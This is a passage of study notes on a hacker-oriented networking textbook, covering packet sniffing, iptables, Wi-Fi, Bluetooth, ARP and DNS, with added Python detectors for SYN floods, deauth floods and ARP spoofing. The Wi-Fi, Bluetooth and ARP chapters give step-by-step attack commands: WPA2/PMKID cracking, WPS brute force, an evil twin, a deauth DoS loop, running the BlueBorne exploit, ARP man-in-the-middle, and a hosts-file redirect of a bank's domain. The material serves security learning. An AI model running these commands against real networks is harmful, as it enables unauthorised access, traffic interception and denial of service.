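        forward = (src, sport, dst, dport)      # packet from client to server
        reverse = (dst, dport, src, sport)      # packet from server to client
        if flags == "S":
            state[forward] = "SYN_SENT"
        elif flags == "S." and state.get(reverse) == "SYN_SENT":
            state[reverse] = "SYN_RECEIVED"
        elif flags == "." and state.get(forward) == "SYN_RECEIVED":
            state[forward] = "ESTABLISHED"
        elif "R" in flags:
            for key in (forward, reverse):
                if key in state:
                    state[key] = "RESET"
    return state


def half_open_by_source(state: dict) -> Counter:
    """Count connections per client that never finished the handshake."""
    counts = Counter()
    for (client, _cport, _server, _sport), s in state.items():
        if s in ("SYN_SENT", "SYN_RECEIVED"):
            counts[client] += 1
    return counts


def syn_flood_suspects(lines, threshold: int = 10) -> dict:
    """Sources with at least `threshold` half-open connections in the capture."""
    counts = half_open_by_source(track_handshakes(lines))
    return {src: n for src, n in counts.items() if n >= threshold}


def sample_capture() -> list:
    """Constructed tcpdump output: one completed handshake, then a burst of
    SYNs from one source that never send the final ACK."""
    lines = [
        "12:00:01.000000 IP 10.0.0.5.51000 > 192.168.1.20.80: Flags [S], seq 1, win 64240, length 0",
        "12:00:01.000100 IP 192.168.1.20.80 > 10.0.0.5.51000: Flags [S.], seq 100, ack 2, win 65160, length 0",
        "12:00:01.000200 IP 10.0.0.5.51000 > 192.168.1.20.80: Flags [.], ack 101, win 502, length 0",
    ]
    for i in range(12):
        lines.append(f"12:00:02.{i:06d} IP 203.0.113.9.{40000 + i} > 192.168.1.20.80: "
                     f"Flags [S], seq {i}, win 1024, length 0")
        lines.append(f"12:00:02.{i:06d} IP 192.168.1.20.80 > 203.0.113.9.{40000 + i}: "
                     f"Flags [S.], seq 7, ack {i + 1}, win 65160, length 0")
    return lines


if __name__ == "__main__":
    for src, n in syn_flood_suspects(sample_capture()).items():
        print(f"{src}: {n} half-open connections")
```

On a real capture, feed it `sudo tcpdump -n 'tcp[tcpflags] & (tcp-syn|tcp-rst) != 0 or tcp[tcpflags] == tcp-ack'` output (the -n matters, since the regex expects numeric addresses) and raise the threshold to suit the host's normal connection rate.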

Wireshark

GUI-based sniffer and the de-facto standard. Built into Kali.

wireshark &     # Launch from terminal

Three Panes

┌─────────────────────────────────────┐
│  #1 Packet List Pane                │  ← Color-coded live packets
├─────────────────────────────────────┤
│  #2 Packet Details Pane             │  ← Header fields of selected packet
├─────────────────────────────────────┤
│  #3 Packet Bytes Pane               │  ← Hex (left) + ASCII (right) payload
└─────────────────────────────────────┘

Wireshark Filters

Filter Purpose
tcp TCP traffic only
udp UDP traffic only
http HTTP traffic
dns DNS traffic
smtp SMTP traffic
ip.addr == 192.168.1.107 Traffic to/from IP
ip.src == 192.168.1.107 From IP only
ip.dst == 192.168.1.107 To IP only
tcp.dstport == 80 TCP to port 80
tcp contains facebook Payload contains string
tcp.flags.rst == 1 RST flag set
tcp.flags.syn == 1 SYN flag set

Note: Use == (double equals), not =. Single = does not work in Wireshark syntax.

Wireshark Operators

Operator Meaning
== Equal to
!= Not equal to
> Greater than
< Less than
>= Greater than or equal
<= Less than or equal
contains Field contains a value
matches Matches a regex

Following Streams

Right-click a packet → Follow → TCP Stream

Shows the full conversation of a session (e.g. follow a rogue employee's connection).

Statistics

Statistics menu → IPv4 Statistics → All Addresses

Useful for baselining normal traffic and spotting anomalies.


Exercises

  1. Use tcpdump to filter out all traffic not going to/from your IP address.
  2. Connect to hackers-arise.com. Use Wireshark to filter only that site's traffic.
  3. Use Wireshark to filter for traffic containing the word "hacker."
  4. Use netstat to find all connections to your system.


Chapter 4 - Linux Firewalls (iptables)


What is a Firewall?

A firewall blocks certain network traffic going into or out of a computer.

  • Hardware firewall: protects the whole network
  • Software firewall: protects only the host it runs on

iptables is Linux's built-in, flexible CLI firewall utility. Available since January 2001 as part of the Linux kernel (Netfilter project).


iptables Structure

iptables is organised in nested layers: Tables → Chains → Rules → Targets

Tables

Table Purpose
FILTER Default. Packet filtering (allow/block)
NAT Rewrite source/destination of packets
MANGLE Alter packet headers (e.g. modify TCP header)
RAW Exemptions from connection tracking

Chains (in FILTER table)

Chain Description
INPUT Packets destined for the local system
OUTPUT Packets leaving the local system
FORWARD Packets being routed through the system

Targets (Actions)

Target Action
ACCEPT Allow the packet
DROP Silently discard (no response to sender)
REJECT Discard and send error back to sender
LOG Log the packet
RETURN Return to calling chain

Core Commands

# Install (usually pre-installed)
sudo apt install iptables

# View current rules
sudo iptables -L

# View with line numbers
sudo iptables -L --line-numbers

# View help
sudo iptables -h

Key Options

Option Meaning
-A Append rule to chain
-D Delete rule from chain
-L List rules
-F Flush (delete all rules)
-s Source address
-d Destination address
-p Protocol (tcp, udp, icmp)
--dport Destination port
-j Jump to target (ACCEPT, DROP, REJECT)

Creating Rules

Block an IP address

sudo iptables -A INPUT -s 192.168.1.102 -j DROP

Block an entire subnet

sudo iptables -A INPUT -s 192.168.1.0/24 -j DROP

Block a specific port

sudo iptables -A INPUT -p tcp --dport 22 -j DROP     # Block SSH
sudo iptables -A INPUT -p tcp --dport 445 -j DROP    # Block SMB

Allow outbound to a specific site

sudo iptables -A OUTPUT -p tcp -d amazon.com -j ACCEPT

Block all outbound web traffic (except above)

sudo iptables -A OUTPUT -p tcp --dport 80 -j DROP
sudo iptables -A OUTPUT -p tcp --dport 443 -j DROP

⚠️ Rule Order Matters! iptables processes rules top-to-bottom. The first match wins. Place ACCEPT rules BEFORE DROP rules for the same destination.

Flush (delete) all rules

sudo iptables -F

Default Policy

sudo iptables -L    # Shows current default policy (usually ACCEPT)
  • Default ACCEPT = allow everything unless a rule blocks it (permissive)
  • Default DROP = block everything unless a rule allows it (very secure, very tedious)

Full Example - Restricted Browsing

Allow only hackers-arise.com on ports 80/443, block everything else:

# 1. Allow outbound to hackers-arise.com
sudo iptables -A OUTPUT -p tcp -d hackers-arise.com -j ACCEPT

# 2. Block all other HTTP/HTTPS outbound
sudo iptables -A OUTPUT -p tcp --dport 80 -j DROP
sudo iptables -A OUTPUT -p tcp --dport 443 -j DROP

# 3. Check the table
sudo iptables -L

# 4. Reset when done
sudo iptables -F
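Added example (mine, not from the book): a Python simulation of how iptables evaluates a chain, so you can see the "first match wins" rule and the default policy from the sections above before touching a live box. It reads the exact command lines used in this chapter (only the options from the Key Options table are understood), builds the restricted-browsing rule set in the correct order and in the reversed order, and returns which rule decided each packet. Because iptables resolves a -d hostname to addresses when the rule is added, the allowed site is represented by the constructed placeholder 203.0.113.10.

```python
import ipaddress
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Rule:
    chain: str
    target: str                    # ACCEPT / DROP / REJECT
    proto: Optional[str] = None    # tcp / udp / icmp
    src: Optional[str] = None      # IP or CIDR
    dst: Optional[str] = None      # IP or CIDR
    dport: Optional[int] = None


@dataclass
class Packet:
    chain: str
    proto: str
    src: str
    dst: str
    dport: int


def rule_from_command(cmd: str) -> Rule:
    """Translate an `iptables -A ...` line into a Rule (Key Options table only)."""
    argv = shlex.split(cmd)
    if argv and argv[0] == "sudo":
        argv = argv[1:]
    if not argv or argv[0] != "iptables":
        raise ValueError(f"not an iptables command: {cmd}")
    fields = {}
    i = 1
    while i < len(argv):
        if i + 1 >= len(argv):
            raise ValueError(f"option {argv[i]} needs a value")
        opt, val = argv[i], argv[i + 1]
        if opt == "-A":
            fields["chain"] = val
        elif opt == "-j":
            fields["target"] = val
        elif opt == "-p":
            fields["proto"] = val
        elif opt == "-s":
            fields["src"] = val
        elif opt == "-d":
            fields["dst"] = val
        elif opt == "--dport":
            fields["dport"] = int(val)
        else:
            raise ValueError(f"unsupported option {opt}")
        i += 2
    return Rule(**fields)


def _in_net(addr: str, spec: str) -> bool:
    return ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)


def matches(rule: Rule, pkt: Packet) -> bool:
    """Every criterion the rule sets must match; unset criteria match anything."""
    return (rule.chain == pkt.chain
            and (rule.proto is None or rule.proto == pkt.proto)
            and (rule.src is None or _in_net(pkt.src, rule.src))
            and (rule.dst is None or _in_net(pkt.dst, rule.dst))
            and (rule.dport is None or rule.dport == pkt.dport))


def verdict(rules: List[Rule], policy: dict, pkt: Packet) -> Tuple[str, Optional[int]]:
    """First matching rule wins; returns (target, 1-based rule position).
    With no match the chain's default policy applies (position None)."""
    for pos, rule in enumerate(rules, start=1):
        if matches(rule, pkt):
            return rule.target, pos
    return policy.get(pkt.chain, "ACCEPT"), None


# The chapter's restricted-browsing rules, allowed site as a constructed placeholder address
GOOD_ORDER = [rule_from_command(c) for c in (
    "sudo iptables -A OUTPUT -p tcp -d 203.0.113.10 -j ACCEPT",
    "sudo iptables -A OUTPUT -p tcp --dport 80 -j DROP",
    "sudo iptables -A OUTPUT -p tcp --dport 443 -j DROP",
)]
# Same rules with the ACCEPT appended last: it can never be reached for port 80/443
BAD_ORDER = GOOD_ORDER[1:] + GOOD_ORDER[:1]
POLICY = {"INPUT": "ACCEPT", "OUTPUT": "ACCEPT", "FORWARD": "ACCEPT"}

if __name__ == "__main__":
    site = Packet("OUTPUT", "tcp", "192.168.1.10", "203.0.113.10", 443)
    other = Packet("OUTPUT", "tcp", "192.168.1.10", "198.51.100.20", 443)
    for name, rules in (("good order", GOOD_ORDER), ("bad order", BAD_ORDER)):
        print(f"{name}: site -> {verdict(rules, POLICY, site)}, other -> {verdict(rules, POLICY, other)}")
```

The simulation also shows the permissive side of a default ACCEPT policy: a UDP packet to port 53 matches none of these TCP rules and is accepted by the policy, which is exactly why a tight ruleset ends with DROP rules or a DROP policy.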

Exercises

  1. Create a firewall that only allows connections to hackers-arise.com on ports 80 and 443.
  2. Add a rule to block port 445 (SMB).
  3. Flush all rules when done.


Chapter 5 - Wi-Fi Networks (802.11)


Wi-Fi Basics (802.11)

Wi-Fi = IEEE 802.11, the wireless LAN standard maintained by the IEEE.
Also called WLAN (Wireless Local Area Network).

Key Terminology

Term Meaning
AP Access Point: where clients connect to get internet
PSK Pre-Shared Key: the Wi-Fi password
SSID Network name (e.g. "HomeWifi")
ESSID Extended SSID: same as SSID but spans multiple APs
BSSID Unique identifier of an AP (= AP's MAC address)
Channels Wi-Fi operates on channels 1–14 (1–11 in USA)
Power Signal strength. US limit = 0.5 watts (FCC)
Range Legal limit ≈ 300ft (100m); with high-gain antenna up to 20 miles
Frequency 2.4 GHz and 5 GHz
Modes master (AP), managed (client), monitor (hacker)

Security Protocols

Protocol Year Notes
WEP ~1997 Broken: RC4 flaw cracks in minutes
WPA 2003 Short-term fix: TKIP, longer IV (128-bit)
WPA2 2004 AES/CCMP: stronger, but still crackable
WPA3 ~2018 Latest: rolling out but not yet widespread

WPA2 uses: AES-based CCMP, pairwise master key (PMK) derived from PSK + SSID.


Required Hardware for Hacking

Standard Wi-Fi cards cannot inject frames β€” required for most attacks.
Recommended: Alfa AWUS036NH (~$40 on Amazon), compatible with aircrack-ng.

Check compatible chipsets: aircrack-ng.org compatible cards


Core aircrack-ng Commands

# View wireless interfaces
ifconfig
iwconfig                  # Wireless-only interfaces
iwlist                    # Scan for nearby APs

# Put adapter into monitor mode
sudo airmon-ng start wlan0        # Creates wlan0mon

# Kill processes that cause issues
sudo airmon-ng check kill

# Scan for APs and clients
sudo airodump-ng wlan0mon

# Focus on one AP and one channel, save capture
sudo airodump-ng --bssid <BSSID> -c <channel> --write <filename> wlan0mon

Attack 1 - WPA2-PSK (4-Way Handshake)

Goal: Capture the WPA2 4-way handshake hash, then crack it offline.

Step 1: Monitor mode
sudo airmon-ng start wlan0

Step 2: Scan for targets
sudo airodump-ng wlan0mon

Step 3: Capture handshake on target AP
sudo airodump-ng --bssid <BSSID> -c <channel> --write HackersAriseCrack wlan0mon

Step 4: (Optional) Force a client to reconnect (captures handshake faster)
sudo aireplay-ng --deauth 100 -a <BSSID> wlan0mon

Step 5: Crack the hash with hashcat
hashcat -m 16800 HackersAriseCrack-01.cap /path/to/wordlist.txt

The capture file HackersAriseCrack-01.cap contains the hash.
Good wordlist: top10000passwords.txt from hackers-arise.com


Attack 2 - WPS PIN Bruteforce

WPS (Wi-Fi Protected Setup) β€” press-a-button setup. Introduced a critical flaw:

  • PIN = 8 digits, but digit 8 is a checksum
  • First 4 and last 3 are checked separately
  • Total combinations: 10⁴ + 10³ = 11,000 PINs → brute-forceable in hours

Only affects WPS 1.0 (patched in WPS 2.0, ~2012). Still ~10-20% of APs vulnerable.

# Find APs with WPS enabled
sudo wash -i wlan0mon

# Brute-force WPS PIN with bully
sudo bully wlan0mon -b <BSSID> -e <ESSID> -c <channel>

# Or with reaver
sudo reaver -i wlan0mon -b <BSSID> -vv

Attack 3 - Evil Twin (MitM)

Goal: Create a fake AP with the same SSID. Knock clients off the real AP → they connect to you → all traffic flows through your machine unencrypted.

# Step 1: Create fake AP (airbase-ng)
sudo airbase-ng -a aa:bb:cc:dd:ee:ff --essid <TARGET_SSID> -c 6 wlan0mon

# Step 2: Build a bridge (tunnel from fake AP → ethernet → internet)
sudo ip link add name ha type bridge
sudo ip link set ha up
sudo ip link set eth0 master ha
sudo ip link set at0 master ha     # at0 is the AP interface created by airbase-ng

# Step 3: Start DHCP on the tunnel
sudo dhclient ha &

# Step 4: Knock clients off the real AP
sudo aireplay-ng --deauth 1000 <BSSID> wlan0mon --ignore-negative-one

# Step 5: Open Wireshark → select "ha" interface → see all client traffic!

Attack 4 - DoS (Deauthentication Flood)

# One-shot deauth (kicks everyone off)
sudo aireplay-ng --deauth 100 -a <BSSID> wlan0mon

# Persistent DoS script (send deauths every 60s for ~3 days)
#!/bin/bash
for i in $(seq 1 5000); do
    aireplay-ng --deauth 100 -a <BSSID> wlan0mon
    sleep 60
done

Attack 5 - PMKID Attack (No Client Needed)

Discovered in 2018 by hashcat developers. Capture the hash from a single RSN frame; no client connection required.

# Install hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool.git && cd hcxdumptool
make && make install

# Install hcxtools
git clone https://github.com/ZerBea/hcxtools.git && cd hcxtools
make && make install

# Put adapter in monitor mode
sudo airmon-ng start wlan0

# Capture PMKID from all nearby APs
sudo hcxdumptool -I wlan0mon -o HackersArisePMKID --enable_status=1

# Target a single AP (create a file with BSSID, no colons or spaces)
echo "<BSSID_NO_COLONS>" > targetBSSID
sudo hcxdumptool -I wlan0mon -o HackersArisePMKID --enable_status=1 \
  --filterlist_ap=targetBSSID --filtermode=2

# Convert to hashcat format
hcxcaptool -z hashoutput.txt HackersArisePMKID

# Crack
hashcat -m 16800 hashoutput.txt top10000passwords.txt

Defeating MAC Filtering

MAC filtering allows only specific MAC addresses to connect. Easily bypassed:

# Step 1: Find authenticated client's MAC with airodump-ng
sudo airodump-ng -c 11 -a --bssid <MAC> wlan0mon

# Step 2: Bring down interface
sudo ifconfig wlan0 down

# Step 3: Spoof to authenticated client's MAC
sudo macchanger -m <target_MAC> wlan0

# Step 4: Bring interface back up
sudo ifconfig wlan0 up
# Now connect normally; the MAC whitelist thinks you're a legitimate client

Wi-Fi Frame Types (802.11): Wireshark Filters

Frame Type Wireshark Filter
Association Request Management wlan.fc.type_subtype==0x00
Association Response Management wlan.fc.type_subtype==0x01
Probe Request Management wlan.fc.type_subtype==0x04
Probe Response Management wlan.fc.type_subtype==0x05
Beacon Management wlan.fc.type_subtype==0x08
Disassociation Management wlan.fc.type_subtype==0x0A
Authentication Management wlan.fc.type_subtype==0x0B
Deauthentication Management wlan.fc.type_subtype==0x0C
Data Frame Data wlan.fc.type_subtype==0x20
QoS Data Data wlan.fc.type_subtype==0x28

Note: wlan.fc.type on its own holds only the 2-bit frame type (0 = management, 1 = control, 2 = data), so wlan.fc.type==0x08 matches nothing. The combined type/subtype values above live in wlan.fc.type_subtype.
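Added example (mine, not from the book): a Python detector for the deauthentication flood of Attack 4, keyed on the management-frame subtypes in the table above. It buckets deauthentication and disassociation frames per BSSID in fixed time windows and raises an alert when the count passes a threshold, recording how many were broadcast (addressed to ff:ff:ff:ff:ff:ff, the "kicks everyone off" case). The frames are constructed records of the kind a Wireshark CSV export or a Scapy capture would give you; the window and threshold are my starting values, and nothing is transmitted.

```python
from collections import defaultdict

# wlan.fc.type_subtype values from the table above
TYPE_SUBTYPE = {
    0x00: "Association Request", 0x01: "Association Response",
    0x04: "Probe Request", 0x05: "Probe Response", 0x08: "Beacon",
    0x0A: "Disassociation", 0x0B: "Authentication", 0x0C: "Deauthentication",
    0x20: "Data", 0x28: "QoS Data",
}
DEAUTH = 0x0C
DISASSOC = 0x0A
BROADCAST = "ff:ff:ff:ff:ff:ff"


def frame_name(type_subtype: int) -> str:
    """Human-readable name for a type/subtype value."""
    return TYPE_SUBTYPE.get(type_subtype, f"unknown (0x{type_subtype:02x})")


def deauth_flood_alerts(frames, window: float = 10.0, threshold: int = 20) -> list:
    """frames: iterable of {"t": seconds, "type_subtype": int, "bssid": str, "dst": str}.
    Counts deauth/disassoc frames per (bssid, time window) and alerts above threshold."""
    buckets = defaultdict(lambda: {"count": 0, "broadcast": 0})
    for f in frames:
        if f["type_subtype"] not in (DEAUTH, DISASSOC):
            continue
        key = (f["bssid"].lower(), int(f["t"] // window))
        buckets[key]["count"] += 1
        if f["dst"].lower() == BROADCAST:
            buckets[key]["broadcast"] += 1
    alerts = []
    for (bssid, slot), c in sorted(buckets.items()):
        if c["count"] >= threshold:
            alerts.append({"bssid": bssid, "window_start": slot * window,
                           "deauths": c["count"], "broadcast": c["broadcast"]})
    return alerts


def sample_frames() -> list:
    """Constructed capture: an AP beaconing normally with two ordinary deauths,
    and a second AP hit by 100 broadcast deauths inside two seconds."""
    frames = []
    for i in range(100):
        frames.append({"t": i * 0.1, "type_subtype": 0x08,
                       "bssid": "aa:bb:cc:00:00:01", "dst": BROADCAST})
    frames.append({"t": 3.0, "type_subtype": DEAUTH,
                   "bssid": "aa:bb:cc:00:00:01", "dst": "11:22:33:44:55:66"})
    frames.append({"t": 7.5, "type_subtype": DEAUTH,
                   "bssid": "aa:bb:cc:00:00:01", "dst": "11:22:33:44:55:67"})
    for i in range(100):
        frames.append({"t": 12.0 + i * 0.02, "type_subtype": DEAUTH,
                       "bssid": "AA:BB:CC:00:00:02", "dst": BROADCAST})
    return frames


if __name__ == "__main__":
    for a in deauth_flood_alerts(sample_frames()):
        print(f"{a['bssid']} window starting {a['window_start']:.0f}s: "
              f"{a['deauths']} deauth/disassoc frames, {a['broadcast']} broadcast")
```

A handful of deauths per window is normal (APs send them when clients idle out or roam); a burst of broadcast deauths that no client asked for is the signature to alert on, and 802.11w (protected management frames) is the setting that stops them being honoured.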

Exercises

  1. Use iwconfig to view all wireless connections.
  2. Use airmon-ng to place your adapter into monitor mode.
  3. Use airodump-ng to find all APs and clients in range.
  4. Use Wireshark to filter only your Wi-Fi interface traffic.
  5. Use wash to find any WPS-enabled devices in range.


Chapter 6 - Bluetooth Networks


Bluetooth Basics

  • Developed in 1994 by Ericsson Corp. (Sweden)
  • Named after 10th-century Danish King Harald Bluetooth
  • Operates at 2.4–2.485 GHz using frequency hopping at 1,600 hops/second (security measure)
  • Minimum range: 10 meters; many devices up to 100 meters; extended with special antennas

Discoverable Device Broadcasts

  • Name
  • Class
  • List of services
  • Technical information

Pairing

When two devices pair, each exchanges a pre-shared secret (link key) stored for future pairing.
Every device has a unique 48-bit identifier (like a MAC address) and a manufacturer-assigned name.

Piconet

  • Bluetooth devices form a piconet: one master + up to 7 active slaves
  • Frequency hopping prevents interference between piconets

Linux Bluetooth Tools (BlueZ)

BlueZ = Linux's Bluetooth protocol stack (installed by default on Kali).

# View Bluetooth interfaces (like ifconfig for BT)
hciconfig
hciconfig hci0 up        # Bring up interface

# Inquiry / scanning tool (device name, ID, class, clock)
hcitool scan             # Scan for nearby devices
hcitool inq              # Inquiry mode

# Sniff Bluetooth communication
hcidump

Bluetooth Protocol Stack

┌──────────────────────────────┐
│  Adopted Protocols           │  PPP, UDP/TCP/IP, OBEX, WAP
├──────────────────────────────┤
│  Telephony Control           │  TCS Binary, AT-commands
├──────────────────────────────┤
│  Cable Replacement           │  RFCOMM
├──────────────────────────────┤
│  Bluetooth Core Protocols    │  Baseband, LMP, L2CAP, SDP
└──────────────────────────────┘

Applications typically use only one vertical slice of this stack.


Bluetooth Security Modes

| Mode | Description |
|------|-------------|
| Mode 1 | No active security |
| Mode 2 | Service-level security — a centralized security manager handles authentication and configuration |
| Mode 3 | Device-level security — authentication + encryption always on |

Security mechanisms:

  • Frequency hopping algorithm (known only to paired devices)
  • Pre-shared link key (128-bit encryption)

Bluetooth Hacking Tools (Kali)

Go to: Applications → Kali Linux → Wireless Attacks → Bluetooth Tools

| Tool | Purpose |
|------|---------|
| Bluelog | Site survey — scan and log discoverable devices |
| Bluemaho | GUI suite for Bluetooth security testing |
| Blueranger | Locate devices using L2CAP pings, estimate distance |
| Btscanner | GUI scan for discoverable devices |
| Redfang | Find hidden Bluetooth devices |
| Spooftooph | Bluetooth spoofing tool |

Bluetooth Attacks

| Attack | Description |
|--------|-------------|
| Blueprinting | Footprinting — enumerate device info |
| Bluesnarfing | Steal data (SMS, calendar, phonebook, images) from a BT device |
| Bluebugging | Take full control of the target's phone |
| Bluejacking | Send unsolicited "business card" messages |
| Bluesmack | Denial of Service against BT devices |

BlueBorne Attack (CVE-2017-0785)

Released by Armis Security. Exploits the SDP protocol — the device only needs Bluetooth ON (not discoverable).
Affected: iOS (not iOS 10+), Windows, Android.

# Install dependencies
sudo apt-get install bluetooth libbluetooth-dev
pip install pybluez
pip install pwntools

# Clone the exploit
git clone https://github.com/ojasookert/CVE-2017-0785
cd CVE-2017-0785
chmod 755 CVE-2017-0785.py

# Find target's MAC address
hcitool scan

# Run the exploit
python CVE-2017-0785.py TARGET=<MAC_ADDRESS>

The script exploits the SDP vulnerability to extract memory from the device.


⚡ Exercises

  1. Install BlueZ if not already on your system.
  2. Use hciconfig to find your Bluetooth adapter's MAC address.
  3. Use hcitool scan to find nearby Bluetooth devices.


Chapter 7 — Address Resolution Protocol (ARP)


What is ARP?

ARP (Address Resolution Protocol) maps logical IP addresses to physical MAC addresses on a LAN.

  • Operates at Layers 2 and 3 of the OSI model
  • Used by switches/routers to route traffic to the correct physical machine
  • No authentication — critical security weakness

How ARP Works

Computer 1 needs to send to Computer 2 (192.168.1.101)

1. Check ARP table → MAC for 192.168.1.101 found?
   YES → send directly to that MAC
   NO  → broadcast ARP request: "Who has 192.168.1.101?"

2. Computer 2 responds (unicast): "I have .101 — my MAC is 11:22:33:44:55:66"

3. Computer 1 updates ARP table → sends packet to 11:22:33:44:55:66

ARP Commands

Windows

arp -a        # View ARP table (shows IP, MAC, type: static/dynamic)

Linux

sudo arp -a   # View ARP table
sudo arp -v   # Verbose — shows flags mask and IP class

ARP Packets in Wireshark

Filter: arp

Expand Address Resolution Protocol in Packet Details to see:

  • Sender IP & MAC
  • Target IP & MAC

ARP for Reconnaissance

ARP has no authentication — attackers can send gratuitous ARP requests to discover all hosts on a LAN. Useful after compromising one machine, when pivoting to others (e.g. a database server).

netdiscover

sudo netdiscover -h                         # Help

sudo netdiscover -r 192.168.100.0/24        # Scan subnet

Output shows: IP address, MAC address, NIC vendor for every host on the network.


ARP Spoofing / MitM Attack

How it works:
Attacker sends gratuitous ARP replies claiming that the gateway's IP belongs to the attacker's MAC.
Victim updates its ARP table → sends all traffic to the attacker → Man-in-the-Middle.

Normal:   Victim ──────────────────► Gateway ──► Internet
MitM:     Victim ──► Attacker ──► Gateway ──► Internet
                      └── reads/alters traffic
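What the MitM step looks like on the wire, as an added example (not code from the book or from these notes): a small ARP frame builder and parser, plus a detector that keeps its own IP-to-MAC table from ARP replies and alerts when a known IP suddenly answers from a different MAC. All addresses and frames are constructed for the demo; a real deployment would feed it frames captured from the interface.

```python
# Added example (not code from the book or these notes): parse Ethernet/ARP
# frames and flag the IP-to-MAC rebinding that an ARP-spoofing MitM produces.
# All frames and addresses below are constructed for the demonstration.
import struct
from dataclasses import dataclass

ETHERTYPE_ARP = b"\x08\x06"

@dataclass
class ArpPacket:
    opcode: int        # 1 = request, 2 = reply
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str

def _mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))

def _ip(s: str) -> bytes:
    return bytes(int(o) for o in s.split("."))

def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II + ARP (HTYPE=Ethernet, PTYPE=IPv4). Requests go to broadcast."""
    dst = "ff:ff:ff:ff:ff:ff" if opcode == 1 else target_mac
    eth = _mac(dst) + _mac(sender_mac) + ETHERTYPE_ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    arp += _mac(sender_mac) + _ip(sender_ip) + _mac(target_mac) + _ip(target_ip)
    return eth + arp

def parse_arp(frame: bytes):
    """Return an ArpPacket, or None if the frame is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or frame[12:14] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    body = frame[22:42]
    fmt_mac = lambda b: ":".join(f"{x:02x}" for x in b)
    fmt_ip = lambda b: ".".join(str(x) for x in b)
    return ArpPacket(opcode, fmt_mac(body[0:6]), fmt_ip(body[6:10]),
                     fmt_mac(body[10:16]), fmt_ip(body[16:20]))

def detect_arp_spoofing(frames):
    """Track sender IP -> MAC from ARP replies; alert when a known IP changes MAC.
    Returns (final_table, alerts); each alert is (ip, old_mac, new_mac)."""
    table, alerts = {}, []
    for frame in frames:
        pkt = parse_arp(frame)
        if pkt is None or pkt.opcode != 2:
            continue
        known = table.get(pkt.sender_ip)
        if known is not None and known != pkt.sender_mac:
            alerts.append((pkt.sender_ip, known, pkt.sender_mac))
        table[pkt.sender_ip] = pkt.sender_mac
    return table, alerts

# Constructed traffic: the real gateway answers a request, then a second host
# sends an unsolicited reply claiming the gateway's IP (the MitM step above).
GATEWAY_IP, VICTIM_IP = "192.168.1.1", "192.168.1.101"
GATEWAY_MAC, VICTIM_MAC = "00:11:22:33:44:01", "00:11:22:33:44:65"
ATTACKER_MAC = "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    build_arp(1, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GATEWAY_IP),   # who has .1?
    build_arp(2, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),           # legitimate reply
    build_arp(2, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),          # spoofed reply
]

if __name__ == "__main__":
    table, alerts = detect_arp_spoofing(SAMPLE_FRAMES)
    for ip, old, new in alerts:
        print(f"ALERT: {ip} moved from {old} to {new} (possible ARP spoofing)")
```

The detector is deliberately simple: it trusts the first MAC it sees for an IP, so it should be started while the LAN is in a known-good state (or seeded from a static list of gateway and server MACs). Static ARP entries for the gateway, or Dynamic ARP Inspection on the switch, stop the rebinding rather than just reporting it.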

Tools for ARP MitM

# Ettercap (GUI + CLI)
ettercap -T -q -i eth0 -M arp /victim_IP/ /gateway_IP/

# arpspoof (dsniff suite)
arpspoof -i eth0 -t <victim_IP> <gateway_IP>

# driftnet — view victim's images in real-time
driftnet -i eth0

ARP via Metasploit Meterpreter

After compromising a host, use ARP to pivot and discover other targets:

# In meterpreter session
run post/multi/gather/arp_scanner RHOSTS=192.168.1.0/24

Sends gratuitous ARP requests → discovers all hosts on the network → find valuable targets (file server, DB server).


⚡ Exercises

  1. Use arp -a to view your ARP table.
  2. Use netdiscover to find other hosts on your LAN.
  3. Create a Wireshark filter to view only ARP packets.


Chapter 8 — Domain Name Service (DNS)


What is DNS?

DNS translates human-readable domain names → machine-readable IP addresses.

www.hackers-arise.com  →  23.236.62.147

Without DNS you'd have to memorize IP addresses of every website. DNS makes the internet usable.


Domain Name Hierarchy

              . (root)
              │
         ┌────┴────┐
        .com      .org ...
         │
    ┌────┴────┐
  redhat    hackers-arise
    │
 ┌──┴──┐
sales  eng

  • TLD = Top Level Domain (.com, .org, .edu)
  • SLD = Second Level Domain (hackers-arise, redhat)
  • Subdomain = left of the SLD (sales.redhat, engineering.redhat)
  • FQDN = Fully Qualified Domain Name = full path from the root (www.hackers-arise.com.)

The Hosts File

Before DNS, a single text file mapped names → IPs.
Still present on every system — and it takes precedence over DNS queries.

# Linux
sudo mousepad /etc/hosts      # Open hosts file

Example hosts file:

127.0.0.1        localhost
192.168.1.1      router.local
192.168.1.114    bankofamerica.com    # DNS spoofing via hosts file!

🎯 Attack: Add a line to /etc/hosts to redirect a domain to your malicious server. All local DNS queries for that domain will hit your IP instead.


How DNS Works

Client asks: "What is download.beta.example.com?"

1. Client → Local DNS Server → "I don't know"
2. Local DNS → Root Server → "Try the .com TLD server at X.X.X.X"
3. Local DNS → .com TLD Server → "Try the example.com authoritative server at Y.Y.Y.Y"
4. Local DNS → example.com Auth Server → "download.beta.example.com = Z.Z.Z.Z"
5. Local DNS → Client → "Z.Z.Z.Z"
6. Client caches the result for future use

DNS is distributed and hierarchical — resistant to single-server failures.


DNS Components

| Component | Description |
|-----------|-------------|
| DNS Cache | Previously resolved names stored locally (faster, no traffic) |
| Resolvers | Any client that needs to look up DNS (your computer) |
| Name Servers | Databases containing name → IP mappings |
| Name Space | The full database of IP addresses and names |

DNS Record Types

| Record | Purpose | Example |
|--------|---------|---------|
| A | Domain → IPv4 address | hackers-arise.com → 23.236.62.147 |
| AAAA | Domain → IPv6 address | |
| CNAME | Alias → another domain | www → hackers-arise.com |
| MX | Mail server for domain | Must point to a domain, not an IP |
| NS | Authoritative name server | |
| PTR | IP → hostname (reverse DNS) | |
| SOA | Start of Authority — first record in the zone file | |
| TXT | Arbitrary text (SPF, DMARC, verification) | |

DNS Uses UDP (not TCP)

